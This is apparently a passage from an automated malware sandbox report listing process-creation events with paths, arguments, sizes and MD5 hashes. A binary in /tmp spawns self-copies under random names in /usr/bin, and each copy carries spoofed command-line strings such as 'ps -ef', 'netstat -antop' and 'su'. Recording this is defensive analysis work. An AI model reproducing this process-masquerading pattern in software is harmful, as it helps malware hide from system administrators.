                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:25
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/ibtfyvoofm
                                                            Arguments:/usr/bin/ibtfyvoofm "echo \"find\"" 9446
                                                            File size:625933 bytes
                                                            MD5 hash:03edbd21c1aa2730f07a68b2348159b3

                                                            Start time:09:51:25
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/ibtfyvoofm
                                                            Arguments:n/a
                                                            File size:625933 bytes
                                                            MD5 hash:03edbd21c1aa2730f07a68b2348159b3

                                                            Start time:09:51:25
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:25
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:25
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/ibtfyvoofm
                                                            Arguments:/usr/bin/ibtfyvoofm "route -n" 9446
                                                            File size:625933 bytes
                                                            MD5 hash:03edbd21c1aa2730f07a68b2348159b3

                                                            Start time:09:51:25
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/ibtfyvoofm
                                                            Arguments:n/a
                                                            File size:625933 bytes
                                                            MD5 hash:03edbd21c1aa2730f07a68b2348159b3

                                                            Start time:09:51:25
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:25
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:25
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/ibtfyvoofm
                                                            Arguments:/usr/bin/ibtfyvoofm "ps -ef" 9446
                                                            File size:625933 bytes
                                                            MD5 hash:03edbd21c1aa2730f07a68b2348159b3

                                                            Start time:09:51:25
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/ibtfyvoofm
                                                            Arguments:n/a
                                                            File size:625933 bytes
                                                            MD5 hash:03edbd21c1aa2730f07a68b2348159b3

                                                            Start time:09:51:30
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:30
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:30
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/tlayyibcia
                                                            Arguments:/usr/bin/tlayyibcia "netstat -antop" 9446
                                                            File size:625911 bytes
                                                            MD5 hash:7cf86117f153415b6daedda78b73d36d

                                                            Start time:09:51:30
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/tlayyibcia
                                                            Arguments:n/a
                                                            File size:625911 bytes
                                                            MD5 hash:7cf86117f153415b6daedda78b73d36d

                                                            Start time:09:51:30
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:30
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:30
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/tlayyibcia
                                                            Arguments:/usr/bin/tlayyibcia who 9446
                                                            File size:625911 bytes
                                                            MD5 hash:7cf86117f153415b6daedda78b73d36d

                                                            Start time:09:51:30
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/tlayyibcia
                                                            Arguments:n/a
                                                            File size:625911 bytes
                                                            MD5 hash:7cf86117f153415b6daedda78b73d36d

                                                            Start time:09:51:30
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:30
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:30
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/tlayyibcia
                                                            Arguments:/usr/bin/tlayyibcia "sleep 1" 9446
                                                            File size:625911 bytes
                                                            MD5 hash:7cf86117f153415b6daedda78b73d36d

                                                            Start time:09:51:30
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/tlayyibcia
                                                            Arguments:n/a
                                                            File size:625911 bytes
                                                            MD5 hash:7cf86117f153415b6daedda78b73d36d

                                                            Start time:09:51:30
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:30
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:30
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/tlayyibcia
                                                            Arguments:/usr/bin/tlayyibcia "cat resolv.conf" 9446
                                                            File size:625911 bytes
                                                            MD5 hash:7cf86117f153415b6daedda78b73d36d

                                                            Start time:09:51:30
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/tlayyibcia
                                                            Arguments:n/a
                                                            File size:625911 bytes
                                                            MD5 hash:7cf86117f153415b6daedda78b73d36d

                                                            Start time:09:51:30
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:30
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:30
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/tlayyibcia
                                                            Arguments:/usr/bin/tlayyibcia pwd 9446
                                                            File size:625911 bytes
                                                            MD5 hash:7cf86117f153415b6daedda78b73d36d

                                                            Start time:09:51:30
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/tlayyibcia
                                                            Arguments:n/a
                                                            File size:625911 bytes
                                                            MD5 hash:7cf86117f153415b6daedda78b73d36d

                                                            Start time:09:51:35
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:35
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:35
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/dzlsbdiinr
                                                            Arguments:/usr/bin/dzlsbdiinr "echo \"find\"" 9446
                                                            File size:625922 bytes
                                                            MD5 hash:65badaeedebb92c5ee46db973849ecc9

                                                            Start time:09:51:35
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/dzlsbdiinr
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:65badaeedebb92c5ee46db973849ecc9

                                                            Start time:09:51:35
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:35
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:35
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/dzlsbdiinr
                                                            Arguments:/usr/bin/dzlsbdiinr "sleep 1" 9446
                                                            File size:625922 bytes
                                                            MD5 hash:65badaeedebb92c5ee46db973849ecc9

                                                            Start time:09:51:35
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/dzlsbdiinr
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:65badaeedebb92c5ee46db973849ecc9

                                                            Start time:09:51:35
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:35
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:35
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/dzlsbdiinr
                                                            Arguments:/usr/bin/dzlsbdiinr "cat resolv.conf" 9446
                                                            File size:625922 bytes
                                                            MD5 hash:65badaeedebb92c5ee46db973849ecc9

                                                            Start time:09:51:35
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/dzlsbdiinr
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:65badaeedebb92c5ee46db973849ecc9

                                                            Start time:09:51:35
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:35
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:35
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/dzlsbdiinr
                                                            Arguments:/usr/bin/dzlsbdiinr top 9446
                                                            File size:625922 bytes
                                                            MD5 hash:65badaeedebb92c5ee46db973849ecc9

                                                            Start time:09:51:35
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/dzlsbdiinr
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:65badaeedebb92c5ee46db973849ecc9

                                                            Start time:09:51:35
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:35
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:35
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/dzlsbdiinr
                                                            Arguments:/usr/bin/dzlsbdiinr pwd 9446
                                                            File size:625922 bytes
                                                            MD5 hash:65badaeedebb92c5ee46db973849ecc9

                                                            Start time:09:51:35
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/dzlsbdiinr
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:65badaeedebb92c5ee46db973849ecc9

                                                            Start time:09:51:40
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:40
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:40
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qwdfhkhfeq
                                                            Arguments:/usr/bin/qwdfhkhfeq bash 9446
                                                            File size:625922 bytes
                                                            MD5 hash:8319fc5b221a7d18e282495ae6404206

                                                            Start time:09:51:40
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qwdfhkhfeq
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:8319fc5b221a7d18e282495ae6404206

                                                            Start time:09:51:40
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:40
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:40
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qwdfhkhfeq
                                                            Arguments:/usr/bin/qwdfhkhfeq sh 9446
                                                            File size:625922 bytes
                                                            MD5 hash:8319fc5b221a7d18e282495ae6404206

                                                            Start time:09:51:40
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qwdfhkhfeq
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:8319fc5b221a7d18e282495ae6404206

                                                            Start time:09:51:40
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:40
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:40
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qwdfhkhfeq
                                                            Arguments:/usr/bin/qwdfhkhfeq "ps -ef" 9446
                                                            File size:625922 bytes
                                                            MD5 hash:8319fc5b221a7d18e282495ae6404206

                                                            Start time:09:51:40
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qwdfhkhfeq
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:8319fc5b221a7d18e282495ae6404206

                                                            Start time:09:51:40
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:40
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:40
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qwdfhkhfeq
                                                            Arguments:/usr/bin/qwdfhkhfeq gnome-terminal 9446
                                                            File size:625922 bytes
                                                            MD5 hash:8319fc5b221a7d18e282495ae6404206

                                                            Start time:09:51:40
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qwdfhkhfeq
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:8319fc5b221a7d18e282495ae6404206

                                                            Start time:09:51:40
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:40
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:40
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qwdfhkhfeq
                                                            Arguments:/usr/bin/qwdfhkhfeq "route -n" 9446
                                                            File size:625922 bytes
                                                            MD5 hash:8319fc5b221a7d18e282495ae6404206

                                                            Start time:09:51:40
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qwdfhkhfeq
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:8319fc5b221a7d18e282495ae6404206

                                                            Start time:09:51:45
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:45
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:45
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/ldaqsdrmbu
                                                            Arguments:/usr/bin/ldaqsdrmbu "netstat -antop" 9446
                                                            File size:625922 bytes
                                                            MD5 hash:cf6da36df699f9bdadf3a1295d7fe52d

                                                            Start time:09:51:45
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/ldaqsdrmbu
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:cf6da36df699f9bdadf3a1295d7fe52d

                                                            Start time:09:51:45
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:45
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:45
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/ldaqsdrmbu
                                                            Arguments:/usr/bin/ldaqsdrmbu "cat resolv.conf" 9446
                                                            File size:625922 bytes
                                                            MD5 hash:cf6da36df699f9bdadf3a1295d7fe52d

                                                            Start time:09:51:45
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/ldaqsdrmbu
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:cf6da36df699f9bdadf3a1295d7fe52d

                                                            Start time:09:51:45
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:45
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:45
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/ldaqsdrmbu
                                                            Arguments:/usr/bin/ldaqsdrmbu id 9446
                                                            File size:625922 bytes
                                                            MD5 hash:cf6da36df699f9bdadf3a1295d7fe52d

                                                            Start time:09:51:45
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/ldaqsdrmbu
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:cf6da36df699f9bdadf3a1295d7fe52d

                                                            Start time:09:51:45
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:45
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:45
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/ldaqsdrmbu
                                                            Arguments:/usr/bin/ldaqsdrmbu top 9446
                                                            File size:625922 bytes
                                                            MD5 hash:cf6da36df699f9bdadf3a1295d7fe52d

                                                            Start time:09:51:45
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/ldaqsdrmbu
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:cf6da36df699f9bdadf3a1295d7fe52d

                                                            Start time:09:51:45
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:45
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:45
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/ldaqsdrmbu
                                                            Arguments:/usr/bin/ldaqsdrmbu "route -n" 9446
                                                            File size:625922 bytes
                                                            MD5 hash:cf6da36df699f9bdadf3a1295d7fe52d

                                                            Start time:09:51:45
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/ldaqsdrmbu
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:cf6da36df699f9bdadf3a1295d7fe52d

                                                            Start time:09:51:50
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:50
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:50
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wuipuaslsy
                                                            Arguments:/usr/bin/wuipuaslsy su 9446
                                                            File size:625922 bytes
                                                            MD5 hash:da49eab2e2e3d98ad381b18c0720ad92

                                                            Start time:09:51:50
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wuipuaslsy
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:da49eab2e2e3d98ad381b18c0720ad92

                                                            Start time:09:51:50
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:50
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:50
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wuipuaslsy
                                                            Arguments:/usr/bin/wuipuaslsy pwd 9446
                                                            File size:625922 bytes
                                                            MD5 hash:da49eab2e2e3d98ad381b18c0720ad92

                                                            Start time:09:51:50
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wuipuaslsy
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:da49eab2e2e3d98ad381b18c0720ad92

                                                            Start time:09:51:50
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:50
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:50
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wuipuaslsy
                                                            Arguments:/usr/bin/wuipuaslsy top 9446
                                                            File size:625922 bytes
                                                            MD5 hash:da49eab2e2e3d98ad381b18c0720ad92

                                                            Start time:09:51:50
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wuipuaslsy
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:da49eab2e2e3d98ad381b18c0720ad92

                                                            Start time:09:51:50
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:50
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:50
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wuipuaslsy
                                                            Arguments:/usr/bin/wuipuaslsy "sleep 1" 9446
                                                            File size:625922 bytes
                                                            MD5 hash:da49eab2e2e3d98ad381b18c0720ad92

                                                            Start time:09:51:50
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wuipuaslsy
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:da49eab2e2e3d98ad381b18c0720ad92

                                                            Start time:09:51:50
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:50
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:50
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wuipuaslsy
                                                            Arguments:/usr/bin/wuipuaslsy "cat resolv.conf" 9446
                                                            File size:625922 bytes
                                                            MD5 hash:da49eab2e2e3d98ad381b18c0720ad92

                                                            Start time:09:51:50
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wuipuaslsy
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:da49eab2e2e3d98ad381b18c0720ad92

                                                            Start time:09:51:55
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:55
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:55
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/uvaewfcsxa
                                                            Arguments:/usr/bin/uvaewfcsxa who 9446
                                                            File size:625922 bytes
                                                            MD5 hash:052f0628948780b9e671e265706d5750

                                                            Start time:09:51:55
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/uvaewfcsxa
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:052f0628948780b9e671e265706d5750

                                                            Start time:09:51:55
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:55
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:55
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/uvaewfcsxa
                                                            Arguments:/usr/bin/uvaewfcsxa "netstat -an" 9446
                                                            File size:625922 bytes
                                                            MD5 hash:052f0628948780b9e671e265706d5750

                                                            Start time:09:51:55
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/uvaewfcsxa
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:052f0628948780b9e671e265706d5750

                                                            Start time:09:51:55
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:55
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:55
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/uvaewfcsxa
                                                            Arguments:/usr/bin/uvaewfcsxa sh 9446
                                                            File size:625922 bytes
                                                            MD5 hash:052f0628948780b9e671e265706d5750

                                                            Start time:09:51:55
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/uvaewfcsxa
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:052f0628948780b9e671e265706d5750

                                                            Start time:09:51:55
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:55
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:55
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/uvaewfcsxa
                                                            Arguments:/usr/bin/uvaewfcsxa whoami 9446
                                                            File size:625922 bytes
                                                            MD5 hash:052f0628948780b9e671e265706d5750

                                                            Start time:09:51:55
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/uvaewfcsxa
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:052f0628948780b9e671e265706d5750

                                                            Start time:09:51:55
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:55
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:55
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/uvaewfcsxa
                                                            Arguments:/usr/bin/uvaewfcsxa bash 9446
                                                            File size:625922 bytes
                                                            MD5 hash:052f0628948780b9e671e265706d5750

                                                            Start time:09:51:55
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/uvaewfcsxa
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:052f0628948780b9e671e265706d5750

                                                            Start time:09:52:00
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

